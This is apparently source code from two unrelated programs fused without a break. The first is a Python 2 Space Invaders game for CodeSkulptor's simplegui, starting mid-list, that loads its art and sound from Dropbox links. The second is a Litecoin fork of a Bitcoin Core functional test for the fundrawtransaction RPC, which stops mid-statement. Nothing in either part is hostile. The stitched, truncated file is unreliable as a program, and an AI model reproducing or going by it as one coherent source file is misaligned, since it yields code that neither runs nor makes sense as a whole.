aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/b2rxru2nt5q2r1u/alien_3_2.png')) aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/x66vgj9fc2jlg53/alien_3_3.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/7o04ljg52kniyac/alien_4_1.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/b3v6tvami0rvl6r/alien_4_2.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/j451arcevsag36h/alien_4_3.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/jlhdigkm79nncnm/alien_5_1.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/wvlvjsa8yl6gka3/alien_5_2.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/rrg4y1tnsbrh04r/alien_5_3.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/oufyfy590tzf7cx/alien_6_1.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/p4ehd9f6mo2xfzc/alien_6_2.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/815gq3xyh6wmc0t/alien_6_3.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/bv4ycocuomsvj50/alien_7_1.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/krs2gtvdxxve79z/alien_7_2.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/v2wczi8lxwczq87/alien_7_3.png')) #backgrounds bckg = [] bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ibfu2t9vrh4bhxd/back01.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/pcl8vzby25ovis8/back02.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/g8nwo1t9s4i9usg/back03.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ee8oilluf7pe98h/back04.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/7jfgjoxinzwwlx4/back05.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/wh01g2q3607snvz/back06.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/b72ltp2xii9utnr/back07.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/av73jek8egezs1w/back08.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ik54ttfklv3x3ai/back09.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/e9e6kpyg3yuoenc/back10.jpg")) 
bckg.append(simplegui.load_image("https://dl.dropbox.com/s/zrabwnnvlwvn7it/back11.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/a2infkx0rmn8b8m/back12.jpg")) # sounds sndPlayer = simplegui.load_sound('https://dl.dropbox.com/s/vl3as0o2m2wvlwu/player_shoot.wav') sndAlien = simplegui.load_sound('https://dl.dropbox.com/s/m4x0tldpze29hcr/alien_shoot.wav') sndPlayerExplosion = simplegui.load_sound('https://dl.dropbox.com/s/10fn2wh7kk7uoxh/explosion%2001.wav') sndAlienHit = simplegui.load_sound('https://dl.dropbox.com/s/80qdvup27n8j6r1/alien_hit.wav') sndAlienExplosion = simplegui.load_sound('https://dl.dropbox.com/s/qxm3je9vdlb469g/explosion_02.wav') sndBonus = simplegui.load_sound('https://dl.dropbox.com/s/tzp7e20e5v19l01/bonus.wav') sndPause = simplegui.load_sound('https://dl.dropbox.com/s/uzs9nixpd22asno/pause.wav') sndTheme = simplegui.load_sound('https://dl.dropbox.com/s/52zo892uemfkuzm/theme_01.mp3') sounds = [sndPlayer, sndAlien, sndPlayerExplosion, sndAlienExplosion, \ sndBonus, sndPause, sndTheme, sndAlienHit] #Global variables GameRunning = False GameEnded = False player_speed = 0 mes = "" timer_counter = 0 lives = 0 level = 1 scores = 0 killed = 0 current_back = 0 paused = False shoot_count = 0 level_time = [] ready, go = False, False #player = [FIELD_WIDTH //2, FIELD_HEIGHT - 30 + TOP_MARGIN] #game objects user_bullet = [] weapon_level = 1 weapon_speed = BULLET_SPEED alien_bullets = [] alien_fleet = None player = None frame = None aTimer = None dTimer = None bonuses = [] dCounter = 0 back = False bonus_count = [0, 0, 0, 0] player_killed = False player_killed_at = 0 level_map = [] for i in range(7): level_map.append([]) level_map[0] = [ 0, 0, 0, 0] level_map[1] = [129, 0, 0, 0] level_map[2] = [195, 129, 0, 0] level_map[3] = [255, 195, 60, 0] level_map[4] = [255, 231, 195, 195] level_map[5] = [255, 255, 231, 195] level_map[6] = [255, 255, 255, 231] def draw_text(canvas, text, point, size, delta, color): canvas.draw_text(text, point, size, color[0]) canvas.draw_text(text, [point[0]-delta[0], \ point[1]-delta[1]], size, color[1]) class Bonus: def __init__ (self, kind, point): self.kind = kind self.x = point[0] self.y = point[1] self.v = BONUS_SPEED #velocity self.width = 36 self.height = 36 return self def move(self): self.y += self.v return self def draw(self, canvas): if self.kind == 0: #speed of bullet canvas.draw_circle([self.x, self.y], 15, 3, "LightBlue") canvas.draw_text("WS", [self.x-12, self.y+5], self.width //2, "LightBlue") elif self.kind == 1: #weapon level canvas.draw_circle([self.x, self.y], 15, 3, "Red") canvas.draw_text("WL", [self.x-12, self.y+5], self.width //2, "Red") elif self.kind == 2: #life canvas.draw_circle([self.x, self.y], 15, 3, "LightGreen") canvas.draw_text("LF", [self.x-12, self.y+5], self.width //2, "LightGreen") elif self.kind == 3: #weapon power canvas.draw_circle([self.x, self.y], 15, 3, "8010df") canvas.draw_text("WP", [self.x-12, self.y+5], self.width //2, "8010df") return self def execute(self): global weapon_speed, weapon_level, player, scores, bonus_count bonus_count[self.kind] += 1 if self.kind == 0: #speed of bullet weapon_speed += 1 delta = round(math.pow(20, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 1: #weapon level weapon_level += 1 delta = round(math.pow(30, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 2: #life player.lives += 1 delta = round(math.pow(100, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 3: #weapon power player.power += 0.1 delta = 
round(math.pow(100, (1 + (1.0*level-1)/32))*5) scores = scores + delta sndBonus.play() return self def dHandler(): global dCounter, back, player_killed dCounter += 1 if dCounter % 10 == 0: if back: frame.set_canvas_background("Red") else: frame.set_canvas_background("black") back = not back; if dCounter > 50: dCounter = 0 player_killed = False dTimer.stop() frame.set_canvas_background("black") class Bullet: def __init__ (self, point, color, velocity): self.x = point[0] self.y = point[1] self.color = color self.v = velocity self.width = 1 self.height = 1 def draw(self, canvas): canvas.draw_line([self.x, self.y-5], [self.x, self.y+5], 3, self.color) def move(self): self.y += self.v class Alien: def __init__(self, point, kind): self.x = point[0] self.y = point[1] self.kind = kind self.flying = False self.vy = 0 self.vx = 0 self.health = self.get_max_health() self.width = 20 self.height = 20 def get_max_health(self): return 1+0.6 * self.kind[1] def shoot(self): if len(alien_bullets)<level*2: bullet = Bullet([self.x, self.y], "LightRed", BULLET_SPEED) alien_bullets.append(bullet) sndAlien.play() def move(self, point): if self.flying: koef = 1.5 self.y += (self.vy / koef) if self.x>player.x: self.x -= (self.vx / koef) else: self.x += (self.vx / koef) if self.vx<ALIEN_SPEED[0]: self.vx += 1 if self.vy<ALIEN_SPEED[1]: self.vy += 1 else: self.x = point[0] self.y = point[1] def draw(self, canvas): if aImages[self.kind[1]][self.kind[0]].get_width()==0: w = 15 h = 15 canvas.draw_circle([self.x, self.y], 15, 5, "Red") else: # img = aImages[self.kind[1]][self.kind[0]] img = aImages[self.kind[1]][self.kind[0]] self.width = w = img.get_width() self.height = h = img.get_height() canvas.draw_image(img, (w//2, h//2), (w, h), (self.x, self.y), (w, h)) if self.health<>self.get_max_health(): ratio = w * (self.health*1.0) / self.get_max_health() canvas.draw_line([self.x-w//2, self.y-h//2-3], [self.x+w//2, self.y-h//2-3], 4, "red") canvas.draw_line([self.x-w//2, self.y-h//2-3], [self.x-w//2+ratio, self.y-h//2-3], 4, "green") return canvas class AliensFleet: def __init__ (self, point): def is_high_level(place): map_ = (level-1)%7 row = level_map[map_][place[1]] #255 - 0 return (row & (1 << place[0]))<>0 self.x = point[0] self.y = point[1] self.aliens = [] self.pattern = [255, 255, 255, 255] self.y_velocity = ALIEN_HEIGHT//3 + 1 self.x_velocity = - ALIEN_WIDTH//3 + 1 for i in range(self.get_aliens_count()): point = self.get_alien_position(i) place = self.get_alien_place(i) alien_level = (level-1)//7 + is_high_level(place) alien = Alien(point, [random.randrange(3), alien_level]) self.aliens.append(alien) def get_aliens_count(self): c = 0 for i in range(4): for j in range(8): if (self.pattern[i] & (1 << j))<>0: c+=1 return c def get_alien_position(self, n): #returns a screen x, y of alien with number n point = self.get_alien_place(n) x = point[0]*(ALIEN_WIDTH + 3) + self.x y = point[1]*(ALIEN_HEIGHT + 3) +self.y point = [x, y] return point def get_alien_place(self, n): #returns a fleet x, y of alien with number n x, y, c = 0, 0, 0 for i in range(4): for j in range(8): if (self.pattern[i] & (1 << j))<>0: if c==n: x, y = j, i c+=1 point = [x, y] return point def move_aliens(self): i = 0 for alien in self.aliens: point = self.get_alien_position(i) alien.move(point) i += 1 return self def move_down(self): self.y += self.y_velocity if self.y>400: player.explode() self.y = 100 self.move_aliens() def move_side(self): self.x -= self.x_velocity # check borders of fleet: left = 8 right = -1 for i in range(len(self.aliens)): 
point = self.get_alien_place(i) if point[0]<left: left = point[0] if point[0]>right: right = point[0] if (self.x+(left+1)*60 < LEFT_MARGIN + 10) or (self.x + (right+1)*45>FIELD_WIDTH-LEFT_MARGIN-60): self.x_velocity = -self.x_velocity self.move_aliens() def draw(self, canvas): for alien in self.aliens: alien.draw(canvas) def make_shoot(self): for alien in self.aliens: if len(alien_bullets) < level * 3 + 1: if random.randrange(101)<2: # alien.shoot() return self def alien_fly(self): i = 0 for alien in self.aliens: if alien.flying: i += 1 if (i<1+level) and (random.randrange(1000)<3) and (time.time()-level_time[len(level_time)-1]>60): alien.flying=True def check_death(self): global scores, killed, player i = 0 for bullet in user_bullet: for i in range(len(self.aliens)): alien = self.aliens[i] if isBulletHit(bullet, alien): if alien.health-player.power<=0: point = self.get_alien_place(i) sndAlienExplosion.play() self.aliens.remove(alien) x = ~int((1 << point[0])) self.pattern[point[1]] = self.pattern[point[1]] & x user_bullet.remove(bullet) delta = round(math.pow(5, (1 + (1.0*level-1)/32))*5) scores = scores + delta killed += 1 x = random.randrange(1000) if x<5: bonus = Bonus(3, [alien.x, alien.y]) bonuses.append(bonus) elif x<50: bonus = Bonus(2, [alien.x, alien.y]) bonuses.append(bonus) elif x<120: bonus = Bonus(1, [alien.x, alien.y]) bonuses.append(bonus) elif x<200: bonus = Bonus(0, [alien.x, alien.y]) bonuses.append(bonus) if killed % 500 == 0: player.lives += 1 sndBonus.play() break else: user_bullet.remove(bullet) alien.health -= player.power sndAlienHit.play() i += 1 class Player: def __init__(self, point, lives): self.x = point[0] self.y = point[1] self.lives = 3 self.speed = player_speed self.power = BULLET_POWER self.width = 20 self.height = 20 def draw(self, canvas): draw_user_image(canvas, [self.x, self.y]) def move(self): self.x += player_speed if self.x<LEFT_MARGIN*2: self.x = LEFT_MARGIN*2 if self.x>FIELD_WIDTH: self.x=FIELD_WIDTH def draw_lives_counter(self, canvas): if self.lives < 5: for i in range(self.lives): draw_user_image(canvas, [150+i*35, 15]) else: draw_user_image(canvas, [150, 15]) canvas.draw_text(" x "+str(int(self.lives)), [170, 25], 25, "Yellow") def explode(self): global dTimer, alien_bullets, user_bullet, weapon_level, weapon_speed global alien_fleet, player_killed_at, player_killed, player_speed player_speed = 0 player_killed_at = time.time() sndPlayerExplosion.play() for alien in alien_fleet.aliens: alien.flying = False player_killed = True alien_bullets = [] user_bullet = [] bonuses = [] weapon_level = level // 10 + 1 weapon_speed = BULLET_SPEED self.lives -= 1 if self.lives<0: stop_game() dTimer = simplegui.create_timer(25, dHandler) dTimer.start() #helper functions def dummy(key): return key def pause(): global paused paused = not paused sndPause.play() def draw_user_image(canvas, point): # draw a image of user ship # global player if pImage.get_width()==0: canvas.draw_circle(point, 12, 5, "Yellow") else: canvas.draw_image(pImage, (25, 36), (49, 72), point, (34, 50)) player.width = pImage.get_width() player.height = pImage.get_height() return canvas def draw_lives(canvas): # draw lives counter canvas.draw_text("Lives : ", [30, 25], 25, "Red") if player<>None: player.draw_lives_counter(canvas) return canvas def draw_weapons(canvas): canvas.draw_text("Weapon : ", [30, 60], 25, "Red") canvas.draw_text("Rocket lvl: "+str(int(weapon_level)), [135, 60], 25, "Yellow") canvas.draw_text("WS:"+str(weapon_speed/10.0), [280, 48], 10, "00c5fe") 
canvas.draw_text("WP:"+str(player.power), [280, 61], 10, "00c5fe") return canvas def draw_level(canvas): canvas.draw_text("Level : ", [FIELD_WIDTH-200, 50], 50, "Red") canvas.draw_text(str(level), [FIELD_WIDTH-50, 50], 50, "Yellow") return canvas def draw_scores(canvas): canvas.draw_text(str(int(scores)), [400, 50], 50, "LightBlue") return canvas def draw_screen(canvas): # border of board canvas.draw_image(bckg[current_back], (425, 250), (850, 500), \ (LEFT_MARGIN+FIELD_WIDTH//2, TOP_MARGIN+FIELD_HEIGHT//2),\ (FIELD_WIDTH, FIELD_HEIGHT)) canvas.draw_polygon([[LEFT_MARGIN, TOP_MARGIN], [LEFT_MARGIN, FIELD_HEIGHT+TOP_MARGIN], [FIELD_WIDTH+LEFT_MARGIN, FIELD_HEIGHT+TOP_MARGIN], [FIELD_WIDTH+LEFT_MARGIN, TOP_MARGIN]], 2, 'Orange') return canvas def draw_start_screen(canvas): img_count = 1 + len(aImages)*(len(aImages[0])) + len(bckg) loaded_img_count = 0 if pImage.get_width()<>0: loaded_img_count += 1 for bImage in bckg: if bImage.get_width()<>0: loaded_img_count += 1 for aImg in aImages: for img in aImg: if img.get_width()<>0: loaded_img_count += 1 loaded_sounds = 0 for snd in sounds: if snd <> None: loaded_sounds += 1 draw_text(canvas, "SPACE INVANDERS", [220, 150], 50, [3, 3], ["blue", "yellow"]) canvas.draw_text("ver. - "+VER, [600, 170], 20, "yellow") canvas.draw_text("03 nov. 2013", [600, 190], 20, "yellow") draw_text(canvas, "CONTROLS:", [110, 210], 24, [2, 2], ["green", "yellow"]) draw_text(canvas, "Arrows - to left and right, space - to fire, P to pause game", [110, 240], 24, [2, 2], ["green", "yellow"]) draw_text(canvas, "Bonuses: ", [110, 280], 24, [2, 2], ["green", "yellow"]) b = Bonus(0, [125, 310]) b.draw(canvas) draw_text(canvas, " - increase user's bullet speed", [150, 320], 24, [2, 2], ["green", "yellow"]) b = Bonus(1, [125, 350]) b.draw(canvas) draw_text(canvas, " - increase user's bullet number", [150, 360], 24, [2, 2], ["green", "yellow"]) b = Bonus(2, [125, 390]) b.draw(canvas) draw_text(canvas, " - add life", [150, 400], 24, [2, 2], ["green", "yellow"]) b = Bonus(3, [125, 430]) b.draw(canvas) draw_text(canvas, " - increase weapon power", [150, 440], 24, [2, 2], ["green", "yellow"]) if loaded_img_count<img_count: draw_text(canvas, "Please, wait for loading...", [280, 500], 40, [3, 3], ["Blue", "Yellow"]) s = "Loaded "+str(loaded_img_count)+" images of "+str(img_count) draw_text(canvas, s, [110, 550], 20, [2, 2], ["Blue", "yellow"]) s = "Loaded "+str(loaded_sounds)+" sounds of "+str(len(sounds)) draw_text(canvas, s, [510, 550], 20, [2, 2], ["Blue", "yellow"]) else: draw_text(canvas, "Click to start game", [300, 500], 40, [3, 3], ["Blue", "yellow"]) frame.set_mouseclick_handler(click_handler) return canvas def draw_end_screen(canvas): draw_text(canvas, "Game over!", [350, 180], 50, [2, 2], ["Blue", "Yellow"]) draw_text(canvas, "Your score is "+str(int(scores)), [330, 240], 35, [2, 2], ["blue", "Yellow"]) draw_text(canvas, "You shoot "+str(int(shoot_count))+" times", [150, 320], 24, [2, 2], ["blue", "Yellow"]) draw_text(canvas, "You kill a "+str(killed)+" aliens", [150, 360], 24, [2, 2], ["blue", "Yellow"]) if shoot_count == 0: s = "0" else: s = str(int(10000*float(killed)/shoot_count)/100.0) draw_text(canvas, "Your accuracy is "+s+"%", [150, 400], 24, [2, 2], ["blue", "Yellow"]) i = 0 for bc in bonus_count: b = Bonus(i, [505, 310 + 40*i]) b.draw(canvas) draw_text(canvas, " - used "+str(bonus_count[i])+" times", [530, 320+40*i], 24, [2, 2], ["blue", "yellow"]) i += 1 draw_text(canvas, "Click to start new game", [300, 500], 40, [2, 2], ["blue", "Yellow"]) canvas.draw_text("ver. 
- "+VER, [600, 540], 15, "yellow"); return canvas def draw_game_objects(canvas): player.draw(canvas) #draw_user_image(canvas, Player) for bullet in alien_bullets: bullet.draw(canvas) for bullet in user_bullet: bullet.draw(canvas) for bonus in bonuses: bonus.draw(canvas) alien_fleet.draw(canvas) readyGo() if paused: draw_text(canvas, "P A U S E", [380, 350], 50, [2, 2], ["Green", "Yellow"]) if ready: draw_text(canvas, "R E A D Y", [380, 350], 50, [2, 2], ["Green", "Yellow"]) if go: draw_text(canvas, "G O ! ! !", [380, 350], 50, [2, 2], ["Green", "Yellow"]) sndTheme.play() return canvas def moving_objects(): global timer_counter if not GameRunning: return None if paused or ready or go or player_killed: return None timer_counter += 1 player.move() for alien in alien_fleet.aliens: if alien.flying: alien.move([0,0]) if isBulletHit(alien, player): player.explode() if alien.y>FIELD_HEIGHT + TOP_MARGIN+20: alien.y = TOP_MARGIN for bonus in bonuses: bonus.move(); if bonus.y > FIELD_HEIGHT + TOP_MARGIN+20: bonuses.remove(bonus) if isBulletHit(bonus, player): bonus.execute() bonuses.remove(bonus) for bullet in user_bullet: bullet.move() alien_fleet.check_death() for bullet in user_bullet: if bullet.y<TOP_MARGIN+25: user_bullet.remove(bullet) # for bullet in alien_bullets: bullets_to_delete = [] for bullet in list(alien_bullets): bullet.move() if bullet.y > FIELD_HEIGHT + TOP_MARGIN -10: bullets_to_delete.append(bullet) if isBulletHit(bullet, player): player.explode() for bullet in bullets_to_delete: if bullet in alien_bullets: alien_bullets.remove(bullet) alien_fleet.make_shoot() alien_fleet.alien_fly() if level<30: x = 60 - level else: x = 1 if timer_counter % x == 0: alien_fleet.move_side() if timer_counter % (100 + x) == 0: alien_fleet.move_down() if alien_fleet.get_aliens_count() == 0: new_level() # Handler to draw on canvas def draw(canvas): draw_screen(canvas) canvas.draw_text(mes, [250, 250], 40, "Yellow") ###################### #check a begin of game # if GameEnded: draw_end_screen(canvas) elif not GameRunning: draw_start_screen(canvas) else: ################## # game info draw_lives(canvas) draw_weapons(canvas) draw_level(canvas) draw_scores(canvas) draw_game_objects(canvas) return canvas def readyGo(): global ready, go ready = time.time()-level_time[len(level_time)-1]<0.7 go = (not ready) and time.time()-level_time[len(level_time)-1]<1.5 player_killed = time.time() - player_killed_at < 1.2 #Initialization and start of game def start_game(): global GameRunning, alien_fleet, player, GameEnded global scores, killed, level, level_time, bonus_count scores = 0 bonus_count = [0, 0, 0, 0] killed = 0 level = 0 GameEnded = False GameRunning = True new_level() player = Player([FIELD_WIDTH //2, FIELD_HEIGHT + TOP_MARGIN-20], 3) return None def stop_game(): global GameRunning, GameEnded # aTimer.stop() GameEnded = True GameRunning = False level_time.append(time.time()) frame.set_keydown_handler(dummy) frame.set_keyup_handler(dummy) return None # Handler for mouse click def click_handler(position): if not GameRunning: start_game() #else: # stop_game() return position #### keydown_handler def keydown(key): global keypressed, mes, shoot_count, player_speed keypressed = key if (key == simplegui.KEY_MAP['p']) or \ (key == simplegui.KEY_MAP['P']): pause() else: if (key == simplegui.KEY_MAP['right']): #player.move('right') player_speed = PLAYER_SPEED elif (key == simplegui.KEY_MAP['left']): # player.move('left') player_speed = -PLAYER_SPEED if (key == simplegui.KEY_MAP['space'])and(GameRunning): if 
len(user_bullet) < weapon_level: b = Bullet([player.x, player.y], "LightBlue", -weapon_speed) user_bullet.append(b) sndPlayer.play() shoot_count += 1 return #### keyup_handler to stop keydown def keyup(key): global player_speed #if keytimer.is_running(): # keytimer.stop() if (key == simplegui.KEY_MAP['right'])or(key == simplegui.KEY_MAP['left']): player_speed = 0 return def isBulletHit(bullet, obj): if (bullet.y+bullet.height//2+2 > obj.y-obj.height // 2) and (bullet.y-bullet.height//2-2<obj.y+obj.height//2): if (bullet.x+bullet.width//2 +2> obj.x - obj.width//2) and (bullet.x-bullet.width//2 -2< obj.x + obj.width//2): return True else: return False else: return False def new_level(): global level, alien_fleet, user_bullet, alien_bullets, current_back, player global level_time, player_speed level_time.append(time.time()) current_back = random.randrange(12) level += 1 player_speed = 0 user_bullet = [] alien_bullets = [] alien_fleet = AliensFleet([250, 100]) if level % 10 == 0: player.lives += 1 sndBonus.play() # Create a frame and assign callbacks to event handlers frame = simplegui.create_frame("Galaxian", 900, 600, 0) frame.set_draw_handler(draw) frame.set_keydown_handler(keydown) frame.set_keyup_handler(keyup) aTimer = simplegui.create_timer(60, moving_objects) aTimer.start() # Start the frame animation frame.start()
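# Illustrative helper (not part of the game above): the fleet 'pattern' and
# the level_map rows are 8-bit masks with one bit per alien column, and
# is_high_level() / get_aliens_count() test bit j with (row & (1 << j)) != 0.
# A quick way to see which columns a row value such as 195 (0b11000011)
# flags:

def decode_row(row):
    """Return eight booleans, one per alien column, bit 0 first."""
    return [(row & (1 << col)) != 0 for col in range(8)]

# decode_row(195) -> [True, True, False, False, False, False, True, True]
# decode_row(255) -> every column flagged
# decode_row(0)   -> no column flagged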
#!/usr/bin/env python3 # Copyright (c) 2014-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the fundrawtransaction RPC.""" from test_framework.test_framework import BitcoinTestFramework, BITCOIND_PROC_WAIT_TIMEOUT from test_framework.util import * def get_unspent(listunspent, amount): for utx in listunspent: if utx['amount'] == amount: return utx raise AssertionError('Could not find unspent with amount={}'.format(amount)) class RawTransactionsTest(BitcoinTestFramework): def __init__(self): super().__init__() self.setup_clean_chain = True self.num_nodes = 4 def setup_network(self, split=False): self.setup_nodes() connect_nodes_bi(self.nodes, 0, 1) connect_nodes_bi(self.nodes, 1, 2) connect_nodes_bi(self.nodes, 0, 2) connect_nodes_bi(self.nodes, 0, 3) def run_test(self): min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee'] # This test is not meant to test fee estimation and we'd like # to be sure all txs are sent at a consistent desired feerate for node in self.nodes: node.settxfee(min_relay_tx_fee) # if the fee's positive delta is higher than this value tests will fail, # neg. delta always fail the tests. # The size of the signature of every input may be at most 2 bytes larger # than a minimum sized signature. # = 2 bytes * minRelayTxFeePerByte feeTolerance = 2 * min_relay_tx_fee/1000 self.nodes[2].generate(1) self.sync_all() self.nodes[0].generate(121) self.sync_all() # ensure that setting changePosition in fundraw with an exact match is handled properly rawmatch = self.nodes[2].createrawtransaction([], {self.nodes[2].getnewaddress():50}) rawmatch = self.nodes[2].fundrawtransaction(rawmatch, {"changePosition":1, "subtractFeeFromOutputs":[0]}) assert_equal(rawmatch["changepos"], -1) watchonly_address = self.nodes[0].getnewaddress() watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"] watchonly_amount = Decimal(200) self.nodes[3].importpubkey(watchonly_pubkey, "", True) watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount) self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0) self.nodes[0].generate(1) self.sync_all() ############### # simple test # ############### inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) #test that we have enough inputs ############################## # simple test with two coins # ############################## inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.2 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) #test if we have enough inputs ############################## # simple test with two coins # ############################## inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.6 } rawtx = 
self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert(len(dec_tx['vin']) > 0) assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '') ################################ # simple test with two outputs # ################################ inputs = [ ] outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert(len(dec_tx['vin']) > 0) assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '') ######################################################################### # test a fundrawtransaction with a VIN greater than the required amount # ######################################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee ##################################################################### # test a fundrawtransaction with which will not get a change output # ##################################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 for out in dec_tx['vout']: totalOut += out['value'] assert_equal(rawtxfund['changepos'], -1) assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee #################################################### # test a fundrawtransaction with an invalid option # #################################################### utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_raises_jsonrpc(-3, "Unexpected key foo", self.nodes[2].fundrawtransaction, rawtx, {'foo':'bar'}) ############################################################ # test a fundrawtransaction with an invalid change address # ############################################################ utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { 
self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_raises_jsonrpc(-5, "changeAddress must be a valid litecoin address", self.nodes[2].fundrawtransaction, rawtx, {'changeAddress':'foobar'}) ############################################################ # test a fundrawtransaction with a provided change address # ############################################################ utx = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ] outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) change = self.nodes[2].getnewaddress() assert_raises_jsonrpc(-8, "changePosition out of bounds", self.nodes[2].fundrawtransaction, rawtx, {'changeAddress':change, 'changePosition':2}) rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 0}) dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) out = dec_tx['vout'][0] assert_equal(change, out['scriptPubKey']['addresses'][0]) ######################################################################### # test a fundrawtransaction with a VIN smaller than the required amount # ######################################################################### utx = get_unspent(self.nodes[2].listunspent(), 1) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}] outputs = { self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) # 4-byte version + 1-byte vin count + 36-byte prevout then script_len rawtx = rawtx[:82] + "0100" + rawtx[84:] dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for i, out in enumerate(dec_tx['vout']): totalOut += out['value'] if 